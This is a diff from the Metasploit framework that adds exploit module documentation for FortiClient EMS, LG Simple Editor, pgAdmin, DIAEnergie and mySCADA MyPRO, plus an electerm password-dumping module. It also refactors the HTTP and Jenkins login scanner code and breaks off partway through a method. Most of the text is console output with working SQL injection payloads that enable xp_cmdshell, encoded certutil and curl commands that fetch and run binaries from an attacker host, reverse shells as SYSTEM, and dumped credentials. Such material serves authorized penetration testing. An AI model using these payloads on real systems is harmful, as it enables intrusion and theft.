+[+] 172.16.199.200:8013 - The SQLi: ';EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; DECLARE @SQL VARCHAR(128) = CONVERT(VARCHAR(MAX), 0X636572747574696c202d75726c6361636865202d6620687474703a2f2f3137322e31362e3139392e313a383038302f2d4c486f5943323263636566425a614c466368434551202554454d50255c707a476e6d44714447554f622e6578652026207374617274202f42202554454d50255c707a476e6d44714447554f622e657865); exec master.dbo.xp_cmdshell @sql;-- was executed successfully
+[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.200:50409) at 2024-07-24 09:35:07 -0700

 meterpreter > getuid
-syServer username: NT AUTHORITY\SYSTEM
+Server username: NT AUTHORITY\SYSTEM
 meterpreter > sysinfo
 Computer        : DC2
 OS              : Windows Server 2019 (10.0 Build 17763).
 Architecture    : x64
 System Language : en_US
 Domain          : KERBEROS
-Logged On Users : 16
+Logged On Users : 9
+Meterpreter     : x64/windows
+meterpreter >
+```
+
+### FortiClientEndpointManagementServer_7.2.2.0879_x64.exe running on Windows Server 2019 (Domain Controller)
+```
+msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > set rhosts 172.16.199.200
+rhosts => 172.16.199.200
+msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > set lhost 172.16.199.1
+lhost => 172.16.199.1
+msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > set verbose true
+verbose => true
+msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > options
+
+Module options (exploit/windows/http/forticlient_ems_fctid_sqli):
+
+   Name    Current Setting  Required  Description
+   ----    ---------------  --------  -----------
+   RHOSTS  172.16.199.200   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT   8013             yes       The target port (TCP)
+   VHOST                    no        HTTP server virtual host
+
+
+Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      rixdOwaGgW       no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
+   LHOST               172.16.199.1     yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic Target
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > run
+
+[*] Command to run on remote host: certutil -urlcache -f http://172.16.199.1:8080/-LHoYC22ccefBZaLFchCEQ %TEMP%\xqUdZSzoE.exe & start /B %TEMP%\xqUdZSzoE.exe
+[*] Fetch handler listening on 172.16.199.1:8080
+[*] HTTP server started
+[*] Adding resource /-LHoYC22ccefBZaLFchCEQ
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] 172.16.199.200:8013 - Running automatic check ("set AutoCheck false" to disable)
+[*] 172.16.199.200:8013 - Sending the following message:
+ MSG_HEADER: FCTUID=CBE8FC122B1A46D18C3541E1A8EFF7BD
+SIZE=    124
+X-FCCK-PROBE: PROBE_FEATURE_BITMAP0|1|
+X-FCCK-PROBE-END
+
+
+[*] 172.16.199.200:8013 - The response received was: FCPROBERPLY: FGT|FCTEMS0000127184:dc2.kerberos.issue|FEATURE_BITMAP|7|EMSVER|7002002|PROTO_VERSION|1.0.0|PERCON|1|
+
+[+] 172.16.199.200:8013 - The target appears to be vulnerable. Version detected: 7.2.2
+[*] 172.16.199.200:8013 - Returning SYSINFO for 7.2 target
+[*] 172.16.199.200:8013 - Sending the following message:
+ MSG_HEADER: FCTUID=';EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'POWERSHELL.EXE -COMMAND ""Add-Type -AssemblyName System.Web; CMD.EXE /C ([SYSTEM.WEB.HTTPUTILITY]::URLDECODE("""%63%65%72%74%75%74%69%6C%20%2D%75%72%6C%63%61%63%68%65%20%2D%66%20%68%74%74%70%3A%2F%2F%31%37%32%2E%31%36%2E%31%39%39%2E%31%3A%38%30%38%30%2F%2D%4C%48%6F%59%43%32%32%63%63%65%66%42%5A%61%4C%46%63%68%43%45%51%20%25%54%45%4D%50%25%5C%78%71%55%64%5A%53%7A%6F%45%2E%65%78%65%20%26%20%73%74%61%72%74%20%2F%42%20%25%54%45%4D%50%25%5C%78%71%55%64%5A%53%7A%6F%45%2E%65%78%65"""))""';--
+IP=172.16.199.151
+MAC=00-0c-29-51-f7-4d
+FCT_ONNET=0
+CAPS=131071
+VDOM=Default
+EC_QUARANTINED=0
+SIZE=     2259
+
+X-FCCK-REGISTER:SYSINFO|RkNUT1M9V0lONjQKT1NWRVI9TWljcm9zb2Z0IFdpbmRvd3MgMTAgUHJvZmVzc2lvbmFsIEVkaXRpb24sIDY0LWJpdCAoYnVpbGQgMTkwNDUpClJTRU5HX1ZFUj0xLjAwMTgyCkNPTV9NT0RFTD1WTXdhcmU3LDEKQVZTSUdfVkVSPTEuMDAwMDAKVVRDPTE3MjE3NTY2MjYKUENfRE9NQUlOPWtlcmJlcm9zLmlzc3VlCkNPTV9NQU49Vk13YXJlLCBJbmMuCkNQVT1JbnRlbChSKSBDb3JlKFRNKSBpNy05NzUwSCBDUFUgQCAyLjYwR0h6CkNPTV9TTj1WTXdhcmUtNTYgNGQgOGEgZDUgN2IgMzkgM2IgMGQtMzMgYzYgMjUgNmEgZTQgNTEgZjcgNGQKREhDUF9TRVJWRVI9Tm9uZQpGQ1RWRVI9Ny4yLjIuMDg2NApFUF9PTk5FVENIS1NVTT0wCkFWRU5HX1ZFUj02LjAwMjg3CkFQUFNJR19WRVI9MjguMDA4MzEKVVNFUj1tc2Z1c2VyCkFQUEVOR19WRVI9NC4wMDA4MgpWVUxTSUdfVkVSPTEuMDA3MDgKQVZBTFNJR19WRVI9MC4wMDAwMApWVUxFTkdfVkVSPTIuMDAwMzcKQVZfUFJPVEVDVEVEPTEKQVZBTEVOR19WRVI9MC4wMDAwMApQRUVSX0lQPTE2Mi4xNTYuNTguMTk5CkVOQUJMRURfRkVBVFVSRV9CSVRNQVA9MTYKRVBfT0ZGTkVUQ0hLU1VNPTAKSU5TVEFMTEVEX0ZFQVRVUkVfQklUTUFQPTQyMDcyNwpFUF9DSEtTVU09MApISURERU5fRkVBVFVSRV9CSVRNQVA9NDE4MDg3CkdST1VQX1RBRz0KRU5BQkxFRF9BUFBTPTAKSU5TVEFMTEVEX0FQUFM9MApESVNLRU5DPQpIT1NUTkFNRT1jbGllbnQKQVZfUFJPRFVDVD1NaWNyb3NvZnQgRGVmZW5kZXIgQW50aXZpcnVzCkZDVF9TTj1GQ1Q4MDAzMTczNjg5NzMwCklOU1RBTExVSUQ9RjQxNkU5QjctQzAxQy00M0RFLTk1RjEtMkJGQ0FEOTAzNTFECk5XSUZTPUV0aGVybmV0MHwxNzIuMTYuMTk5LjE1MXwwMC0wYy0yOS01MS1mNy00ZHwxNzIuMTYuMTk5LjJ8MDAtNTAtNTYtZTgtMDgtNmF8MXwqfDAKTUVNPTE2MzgzCkhERD0xMTkKRE9NQUlOPQpXT1JLR1JPVVA9ClVTRVJfU0lEPVMtMS01LTIxLTE3NjAyNTQxOTEtMzcyMzY0MzQyLTMyNDQ0NTM2ODctMTAwMApBREdVSUQ9CkVQX0ZHVENIS1NVTT0wCkVQX1JVTEVDSEtTVU09MApXRl9GSUxFU0NIS1NVTT0wCkVQX0FQUENUUkxDSEtTVU09MAo=|
+
+X-FCCK-REGISTER-END
+
+
+[*] Client 172.16.199.200 requested /-LHoYC22ccefBZaLFchCEQ
+[*] Sending payload to 172.16.199.200 (Microsoft-CryptoAPI/10.0)
+[*] Client 172.16.199.200 requested /-LHoYC22ccefBZaLFchCEQ
+[*] Sending payload to 172.16.199.200 (CertUtil URL Agent)
+[*] Sending stage (201798 bytes) to 172.16.199.200
+[*] 172.16.199.200:8013 - The response received was:
+[+] 172.16.199.200:8013 - The SQLi: ';EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'POWERSHELL.EXE -COMMAND ""Add-Type -AssemblyName System.Web; CMD.EXE /C ([SYSTEM.WEB.HTTPUTILITY]::URLDECODE("""%63%65%72%74%75%74%69%6C%20%2D%75%72%6C%63%61%63%68%65%20%2D%66%20%68%74%74%70%3A%2F%2F%31%37%32%2E%31%36%2E%31%39%39%2E%31%3A%38%30%38%30%2F%2D%4C%48%6F%59%43%32%32%63%63%65%66%42%5A%61%4C%46%63%68%43%45%51%20%25%54%45%4D%50%25%5C%78%71%55%64%5A%53%7A%6F%45%2E%65%78%65%20%26%20%73%74%61%72%74%20%2F%42%20%25%54%45%4D%50%25%5C%78%71%55%64%5A%53%7A%6F%45%2E%65%78%65"""))""';-- was executed successfully
+[*] Meterpreter session 4 opened (172.16.199.1:4444 -> 172.16.199.200:28146) at 2024-07-23 16:17:56 -0700
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : DC2
+OS              : Windows Server 2019 (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : KERBEROS
+Logged On Users : 9
 Meterpreter     : x64/windows
 meterpreter >
 ```
@@ -0,0 +1,67 @@
+## Vulnerable Application
+
+This module exploits a command injection vulnerability in LG Simple Editor <= v3.21.0 (CVE-2023-40504).
+
+An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary OS commands, which will get executed in the context of
+`NT AUTHORITY\SYSTEM`.
+
+## Testing
+
+The software can be obtained from
+[the vendor](https://www.lg.com/us/business/display-solutions/supersign-w-lite/downloads/LGSimpleEditor_setup_v3_21_0.exe.zip).
+The vulnerable application runs on Apache Tomcat 7, which listens by default on TCP port 8080.
+
+**Successfully tested on**
+
+- LG Simple Editor v3.21.0 on Windows 10 22H2
+
+## Verification Steps
+
+1. Install the application
+2. Start `msfconsole` and run the following commands:
+
+```
+msf6 exploit(windows/http/lg_simple_editor_rce_uploadvideo) > use exploit/windows/http/lg_simple_editor_rce_uploadvideo 
+[*] Using configured payload cmd/windows/http/x64/meterpreter/reverse_tcp
+msf6 exploit(windows/http/lg_simple_editor_rce_uploadvideo) > set RHOSTS <IP>
+msf6 exploit(windows/http/lg_simple_editor_rce_uploadvideo) > exploit
+```
+
+You should get a meterpreter session in the context of `NT AUTHORITY\SYSTEM`.
+
+## Scenarios
+
+Running the exploit against LG Simple Editor v3.21.0 on Windows 10 22H2, using curl as a fetch command, should result in an output similar
+to the following:
+
+```
+msf6 exploit(windows/http/lg_simple_editor_rce_uploadvideo) > exploit 
+
+[*] Command to run on remote host: curl -so %TEMP%\ELizAMEog.exe http://192.168.137.190:8080/Ufbk8y1KXtCzmtyya8K7Jg & start /B
+%TEMP%\ELizAMEog.exe
+[*] Fetch handler listening on 192.168.137.190:8080
+[*] HTTP server started
+[*] Adding resource /Ufbk8y1KXtCzmtyya8K7Jg
+[*] Started reverse TCP handler on 192.168.137.190:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version: 3.21.0
+[*] Sending command injection...
+[*] Using random filename: JyQig.mp4
+[*] Client 192.168.137.196 requested /Ufbk8y1KXtCzmtyya8K7Jg
+[*] Sending payload to 192.168.137.196 (curl/8.7.1)
+[*] Sending stage (201798 bytes) to 192.168.137.196
+[+] Command injection sent.
+[*] Exploit finished, check thy shell.
+[*] Meterpreter session 67 opened (192.168.137.190:4444 -> 192.168.137.196:50129) at 2024-08-06 23:16:30 -0400
+
+meterpreter > sysinfo 
+Computer        : DESKTOP-1FD5QG3
+OS              : Windows 10 (10.0 Build 19045).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+```
@@ -0,0 +1,99 @@
+## Vulnerable Application
+The pgAdmin versions up to 8.4 are vulnerable to a Remote Code Execution (RCE) flaw through the validate binary path API.
+This vulnerability allows attackers to run arbitrary code on the server hosting pgAdmin, which poses a significant
+threat to the integrity of the database management system and the security of its underlying data.
+
+The exploit can be executed in both authenticated and unauthenticated scenarios. When valid credentials are available,
+Metasploit can log in to pgAdmin, upload a malicious payload using the file management plugin, and then execute it via
+the validate_binary_path endpoint. This vulnerability is specific to Windows targets. If authentication is not required
+by the application, Metasploit can directly upload and trigger the payload through the validate_binary_path endpoint.
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use exploit/multi/http/pgadmin_binary_path_api`
+1. Set the `RHOST`, `PAYLOAD`, and optionally the `USERNAME` and `PASSWORD` options
+1. Do: `run`
+
+
+### Installation (Windows)
+
+These steps are the bare minimum to get the application to run for testing and should not be use for a production setup.
+For a production setup, a server like Apache should be setup to run pgAdmin through it's WSGI interface.
+
+**The following paths are all relative to the default installation path `C:\Program Files\pgAdmin 4\web`**.
+
+1. [Download][1] and install the Windows build
+1. Copy the `config_distro.py` file to `config_local.py`
+1. Edit `config_local.py` and set `SERVER_MODE` to `True`
+1. Edit `config_local.py` and add `DEFAULT_SERVER = '0.0.0.0'` to bind on all IPs, required for remotely exploiting from a different machine
+1. Initialize the database: `..\python\python.exe setup.py setup-db`
+1. Create an initial user account: `..\python\python.exe setup.py add-user --admin test@test.com 123456`
+1. Run the application: `..\python\python.exe pgAdmin4.py`
+
+## Scenarios
+Specific demo of using the module that might be useful in a real world scenario.
+
+### pgAdmin 8.4 on Windows (Authenticated)
+
+```
+msf6 exploit(windows/http/pgadmin_binary_path_api) > set RHOSTS 192.168.1.5
+RHOSTS => 192.168.1.5
+msf6 exploit(windows/http/pgadmin_binary_path_api) > set USERNAME test@test.com
+USERNAME => test@test.com
+msf6 exploit(windows/http/pgadmin_binary_path_api) > set PASSWORD 123456
+PASSWORD => 123456
+msf6 exploit(windows/http/pgadmin_binary_path_api) > set LHOST 192.168.1.6 
+LHOST => 192.168.1.6
+msf6 exploit(windows/http/pgadmin_binary_path_api) > exploit 
+
+[*] Started reverse TCP handler on 192.168.1.6:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. pgAdmin version 8.4.0 is affected
+[*] Successfully authenticated to pgAdmin
+[*] Payload uploaded to: C:\Users\pgAdmin\Desktop\CVE-2024-3116\pgadmin4\storage\test_test.com/pg_restore.exe
+[*] Sending stage (201798 bytes) to 192.168.1.5
+[*] Meterpreter session 1 opened (192.168.1.6:4444 -> 192.168.1.5:52588) at 2024-08-26 19:48:10 +0200
+[!] This exploit may require manual cleanup of 'C:\Users\pgAdmin\Desktop\CVE-2024-3116\pgadmin4\storage\test_test.com/pg_restore.exe' on the target
+
+meterpreter > sysinfo
+Computer        : DESKTOP-FMNV75N
+OS              : Windows 10 (10.0 Build 19045).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > 
+
+```
+
+### pgAdmin 8.4 on Windows (Unauthenticated)
+
+```
+msf6 exploit(windows/http/pgadmin_binary_path_api) > set RHOSTS 192.168.1.7
+RHOSTS => 192.168.1.7
+msf6 exploit(windows/http/pgadmin_binary_path_api) > set LHOST 192.168.1.6 
+LHOST => 192.168.1.6
+msf6 exploit(windows/http/pgadmin_binary_path_api) > exploit 
+
+[*] Started reverse TCP handler on 192.168.1.6:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. pgAdmin version 8.4.0 is affected
+[*] Payload uploaded to: C:\Users\pgAdmin\pg_restore.exe
+[*] Sending stage (200774 bytes) to 192.168.1.7
+[*] Meterpreter session 1 opened (192.168.1.6:4444 -> 192.168.1.7:55560) at 2024-08-26 19:51:01 +0200
+[!] This exploit may require manual cleanup of 'C:\Users\pgAdmin\pg_restore.exe' on the target
+
+meterpreter > sysinfo
+Computer        : DESKTOP-HTGS43E
+OS              : Windows 10 (10.0 Build 22000).
+Architecture    : x64
+System Language : en_GB
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x64/windows
+meterpreter > 
+
+```
@@ -0,0 +1,68 @@
+## Vulnerable Application
+
+**Vulnerability Description**
+
+This module exploits a SQL injection vulnerability in DIAEnergie <= v8.28.0 (CVE-2024-4548).
+
+An unauthenticated remote attacker can exploit this vulnerability to inject an arbitrary script through a SQL injection vulnerability, which
+can then be executed in the context of `NT AUTHORITY\SYSTEM`. The vulnerability is within the CEBC service, which listens by default on TCP
+port 928. It accepts various user-controlled data, including `RecalculateHDMWYC` messages, which are insufficiently validated before using
+them as part of a SQL query.
+
+Versions <= 1.10.1.8610 are affected. Tenable published [TRA-2024-13](https://www.tenable.com/security/research/tra-2024-13) to cover the
+security issues.
+
+**Vulnerable Application Installation**
+
+A trial version of the software can be obtained from [the vendor]
+(https://downloadcenter.deltaww.com/downloadCenterCounter.aspx?DID=39969&DocPath=1&hl=en-US).
+For the product to work correctly, SQL Server (e.g., SQL Server Express) needs to be installed.
+
+**Successfully tested on**
+
+- DIAEnergie v1.10 on Windows 10 22H2
+- DIAEnergie v1.9 on Windows 10 22H2
+
+## Verification Steps
+
+1. Install the SQL Server (Express)
+2. Install DIAEnergie
+3. Start `msfconsole` and run the following commands:
+
+```
+msf6 > use exploit/windows/scada/diaenergie_sqli
+[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
+msf6 exploit(windows/scada/diaenergie_sqli) > set RHOSTS <IP>
+msf6 exploit(windows/scada/diaenergie_sqli) > exploit
+```
+
+You should get a meterpreter session in the context of `NT AUTHORITY\SYSTEM`.
+
+## Scenarios
+
+Running the exploit against DIAEnergie v1.10 on Windows 10 22H2, using curl as a fetch command, should result in an output similar to the
+following:
+
+```
+msf6 exploit(windows/scada/diaenergie_sqli) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.241:4444 
+[*] 192.168.1.245:928 - Running automatic check ("set AutoCheck false" to disable)
+[+] 192.168.1.245:928 - The target appears to be vulnerable.
+[*] 192.168.1.245:928 - Sending SQL injection...
+[*] 192.168.1.245:928 - Triggering script execution...
+[*] 192.168.1.245:928 - Cleaning up database...
+[+] 192.168.1.245:928 - Script successfully injected, check thy shell.
+[*] Sending stage (201798 bytes) to 192.168.1.245
+[*] Meterpreter session 1 opened (192.168.1.241:4444 -> 192.168.1.245:50605) at 2024-07-29 23:59:53 -0400
+
+meterpreter > shell
+Process 6392 created.
+Channel 1 created.
+Microsoft Windows [Version 10.0.19045.4529]
+(c) Microsoft Corporation. All rights reserved.
+
+C:\WINDOWS\system32>whoami
+whoami
+nt authority\system
+```
@@ -0,0 +1,79 @@
+## Vulnerable Application
+
+**Vulnerability Description**
+
+This module exploits a command injection vulnerability in mySCADA MyPRO <= v8.28.0 (CVE-2023-28384).
+
+An authenticated remote attacker can exploit this vulnerability to inject arbitrary OS commands, which will get executed in the context of
+`NT AUTHORITY\SYSTEM`.
+This module uses the default admin:admin credentials, but any account configured on the system can be used to exploit this issue.
+
+Versions <= 8.28.0 are affected. CISA published [ICSA-23-096-06](https://www.cisa.gov/news-events/ics-advisories/icsa-23-096-06) to cover
+the security issues. The official changelog for the updated version, v8.29.0, is available
+[here](https://web.archive.org/web/20230320130928/https://www.myscada.org/changelog/?section=version-8-29-0), although it only mentions a
+"General security improvement" without further details.
+
+**Vulnerable Application Installation**
+
+A trial version of the software can be obtained from [the vendor](http://nsa.myscada.org/myPRO/WIN/myPRO_x64_8.28.0.exe).
+For the product to work correctly, the project and log directories need to be configured first, which can be done through the web inteface
+(navigate to System > Storage).
+
+**Successfully tested on**
+
+- mySCADA MyPRO 8.28.0 on Windows 10 22H2
+- mySCADA MyPRO 8.27.0 on Windows 10 22H2
+- mySCADA MyPRO 8.26.0 on Windows 10 22H2
+
+## Verification Steps
+
+1. Install the application
+2. Configure the project and log paths (System > Storage in the web interface, running by default on TCP ports 80 & 443)
+3. Start `msfconsole` and run the following commands:
+
+```
+msf6 > use exploit/windows/scada/mypro_cmdexe
+[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
+msf6 exploit(windows/scada/mypro_cmdexe) > set RHOSTS <IP>
+msf6 exploit(windows/scada/mypro_cmdexe) > exploit
+```
+
+You should get a meterpreter session in the context of `NT AUTHORITY\SYSTEM`.
+
+## Options
+### USERNAME
+
+The username of a MyPRO user (default: admin)
+
+### PASSWORD
+
+The associated password of the MyPRO user (default: admin)
+
+## Scenarios
+
+Running the exploit against MyPRO v8.28.0 on Windows 10 22H2, using curl as a fetch command, should result in an output similar to the
+following:
+
+```
+msf6 exploit(windows/scada/mypro_cmdexe) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.241:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Checking credentials...
+[+] Credentials are working.
+[*] Sending command injection...
+[*] Sending stage (201798 bytes) to 192.168.1.239
+[*] Meterpreter session 12 opened (192.168.1.241:4444 -> 192.168.1.239:57382) at 2024-07-23 23:38:12 -0400
+[*] Exploit finished, check thy shell.
+
+meterpreter > shell
+Process 2632 created.
+Channel 1 created.
+Microsoft Windows [Version 10.0.19045.4651]
+(c) Microsoft Corporation. All rights reserved.
+
+C:\WINDOWS\system32>whoami
+whoami
+nt authority\system
+```
@@ -0,0 +1,55 @@
+## Vulnerable Application
+  electerm is free and open source Terminal/ssh/telnet/serialport/RDP/VNC/sftp client.
+
+  This module will determine if electerm is installed on the target system and, if it is, it will try to
+  dump all saved session information from the target. The passwords for these saved sessions will then be decrypted
+  where possible.
+
+  Any electerm version on any operating system are supported.
+
+  If it works normally, the connection name, host, username and password saved in the certificate file will be printed
+
+### Installation Steps
+
+  1. Download and run the electerm installer (https://github.com/electerm/electerm/).
+  2. Select default installation
+  3. Open the software and create a connection
+     complete password setting, add the test account password to the certificate.
+
+## Verification Steps
+
+  1. Get a session.
+  2. Do: `set session <session number>`
+  3. Do: `run post/multi/gather/credentials/electerm`
+  4. If the system has saved passwords, they will be printed out.
+
+## Options
+
+### BOOKMARKS_FILE_PATH
+
+Specifies the `electerm.bookmarks.nedb` file path for electerm. (eg.
+`C:\Users\FireEye\AppData\Roaming\electerm\users\default_user\electerm.bookmarks.nedb`).
+
+## Scenarios
+
+```
+meterpreter > run post/windows/gather/credentials/electerm
+
+[*] Gather electerm Passwords
+[*] Looking for JSON files in /home/kali-team/.config/electerm/users/default_user/electerm.bookmarks.nedb
+[+] electerm electerm.bookmarks.nedb saved to /home/kali-team/.msf4/loot/20240816195518_default_127.0.0.1_electerm.creds_806863.txt
+[*] Finished processing /home/kali-team/.config/electerm/users/default_user/electerm.bookmarks.nedb
+[+] Passwords stored in: /home/kali-team/.msf4/loot/20240816195518_default_127.0.0.1_host.electerm_421975.txt
+[+] electerm Password
+=================
+
+Title   Type    Host       Port  Username  Password       Description
+-----   ----    ----       ----  --------  --------       -----------
+                127.0.0.1  22    ssh       asdasdawdasdw
+                127.0.0.1  22    asdas     asdasdas
+drp     rdp     127.0.0.1  3389  drp       drppass        rdp test
+telnet  telnet  127.0.0.1  23    root      guest          telnet des
+vnc     vnc     127.0.0.1  5900  vncuser   vncpass        vnc des
+[*] Post module execution completed
+meterpreter >
+```
@@ -1,4 +1,3 @@
-
 require 'metasploit/framework/login_scanner/base'
 require 'metasploit/framework/login_scanner/rex_socket'

@@ -12,14 +11,16 @@ module Metasploit
        include Metasploit::Framework::LoginScanner::Base
        include Metasploit::Framework::LoginScanner::RexSocket

-        DEFAULT_REALM        = nil
-        DEFAULT_PORT         = 80
-        DEFAULT_SSL_PORT     = 443
-        DEFAULT_HTTP_SUCCESS_CODES = [ 200, 201 ].append(*(300..309))
-        LIKELY_PORTS         = [ 80, 443, 8000, 8080 ]
-        LIKELY_SERVICE_NAMES = [ 'http', 'https' ]
-        PRIVATE_TYPES        = [ :password ]
-        REALM_KEY            = Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN
+        AUTHORIZATION_HEADER = 'WWW-Authenticate'.freeze
+        DEFAULT_REALM = nil
+        DEFAULT_PORT = 80
+        DEFAULT_SSL_PORT = 443
+        DEFAULT_HTTP_SUCCESS_CODES = [200, 201].append(*(300..309))
+        DEFAULT_HTTP_NOT_AUTHED_CODES = [401]
+        LIKELY_PORTS = [80, 443, 8000, 8080]
+        LIKELY_SERVICE_NAMES = %w[http https]
+        PRIVATE_TYPES = [:password]
+        REALM_KEY = Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN

        # @!attribute uri
        #   @return [String] The path and query string on the server to
@@ -213,16 +214,14 @@ module Metasploit
            # authentication
            response = http_client._send_recv(request)
          rescue ::EOFError, Errno::ETIMEDOUT, OpenSSL::SSL::SSLError, Rex::ConnectionError, ::Timeout::Error
-            return "Unable to connect to target"
+            return 'Unable to connect to target'
          end

-          if !(response && response.code == 401 && response.headers['WWW-Authenticate'])
-            error_message = "No authentication required"
-          else
-            error_message = false
+          if authentication_required?(response)
+            return false
          end

-          error_message
+          'No authentication required'
        end

        # Sends a HTTP request with Rex
@@ -252,7 +251,7 @@ module Metasploit
                  else
                    cli._send_recv(req)
                  end
-          rescue ::EOFError, Errno::ETIMEDOUT ,Errno::ECONNRESET, Rex::ConnectionError, OpenSSL::SSL::SSLError, ::Timeout::Error => e
+          rescue ::EOFError, Errno::ETIMEDOUT, Errno::ECONNRESET, Rex::ConnectionError, OpenSSL::SSL::SSLError, ::Timeout::Error => e
            raise Rex::ConnectionError, e.message
          ensure
            # If we didn't create the client, don't close it
@@ -315,18 +314,31 @@ module Metasploit
          Result.new(result_opts)
        end

+        protected
+
+        # Returns a boolean value indicating whether the request requires authentication or not.
+        #
+        # @param [Rex::Proto::Http::Response] response The response received from the HTTP endpoint
+        # @return [Boolean] True if the request required authentication; otherwise false.
+        def authentication_required?(response)
+          return false unless response
+
+          self.class::DEFAULT_HTTP_NOT_AUTHED_CODES.include?(response.code) &&
+            response.headers[self.class::AUTHORIZATION_HEADER]
+        end
+
        private

        def create_client(opts)
-          rhost           = opts['host'] || host
-          rport           = opts['rport'] || port
-          cli_ssl         = opts['ssl'] || ssl
+          rhost = opts['host'] || host
+          rport = opts['rport'] || port
+          cli_ssl = opts['ssl'] || ssl
          cli_ssl_version = opts['ssl_version'] || ssl_version
-          cli_proxies     = opts['proxies'] || proxies
-          username        = opts['credential'] ? opts['credential'].public : http_username
-          password        = opts['credential'] ? opts['credential'].private : http_password
-          realm           = opts['credential'] ? opts['credential'].realm : nil
-          context         = opts['context'] || { 'Msf' => framework, 'MsfExploit' => framework_module}
+          cli_proxies = opts['proxies'] || proxies
+          username = opts['credential'] ? opts['credential'].public : http_username
+          password = opts['credential'] ? opts['credential'].private : http_password
+          realm = opts['credential'] ? opts['credential'].realm : nil
+          context = opts['context'] || { 'Msf' => framework, 'MsfExploit' => framework_module}

          kerberos_authenticator = nil
          if kerberos_authenticator_factory
@@ -441,10 +453,22 @@ module Metasploit

        # Combine the base URI with the target URI in a sane fashion
        #
-        # @param [String] target_uri the target URL
+        # @param [Array<String>] target_uri the target URL
        # @return [String] the final URL mapped against the base
-        def normalize_uri(target_uri)
-          (self.uri.to_s + "/" + target_uri.to_s).gsub(/\/+/, '/')
+        def normalize_uri(*target_uri)
+          if target_uri.count == 1
+            (uri.to_s + '/' + target_uri.first.to_s).gsub(%r{/+}, '/')
+          else
+            new_str = target_uri * '/'
+            new_str = new_str.gsub!('//', '/') while new_str.index('//')
+
+            # Makes sure there's a starting slash
+            unless new_str[0,1] == '/'
+              new_str = '/' + new_str
+            end
+
+            new_str
+          end
        end

        private
@@ -5,21 +5,32 @@ module Metasploit
    module LoginScanner
      # Jenkins login scanner
      class Jenkins < HTTP
-
-        include Msf::Exploit::Remote::HTTP::Jenkins
-
        # Inherit LIKELY_PORTS,LIKELY_SERVICE_NAMES, and REALM_KEY from HTTP
        CAN_GET_SESSION = true
-        DEFAULT_PORT    = 8080
-        PRIVATE_TYPES   = [ :password ]
+        DEFAULT_HTTP_NOT_AUTHED_CODES = [403]
+        DEFAULT_PORT = 8080
+        PRIVATE_TYPES = [:password].freeze
+        LOGIN_PATH_REGEX = /action="(j_([a-z0-9_]+))"/
+
+        # Checks the setup for the Jenkins Login scanner.
+        #
+        # @return [String, false] Always returns false.
+        def check_setup
+          login_uri = jenkins_login_url
+
+          return 'Unable to locate the Jenkins login path' if login_uri.nil?
+
+          self.uri = normalize_uri(login_uri)
+
+          false
+        end

        # (see Base#set_sane_defaults)
        def set_sane_defaults
-          self.uri = "/j_acegi_security_check" if self.uri.nil?
-          self.method = "POST" if self.method.nil?
+          self.uri ||= '/'

-          if self.uri[0] != '/'
-            self.uri = "/#{self.uri}"
+          unless uri.to_s.start_with?('/')
+            self.uri = "/#{uri}"
          end

          super
@@ -27,29 +38,94 @@ module Metasploit

        def attempt_login(credential)
          result_opts = {
-              credential: credential,
-              host: host,
-              port: port,
-              protocol: 'tcp'
+            credential: credential,
+            host: host,
+            port: port,
+            protocol: 'tcp'
          }
+
          if ssl
            result_opts[:service_name] = 'https'
          else
            result_opts[:service_name] = 'http'
          end

-          status, proof = jenkins_login(credential.public, credential.private) do |request|
-            send_request({
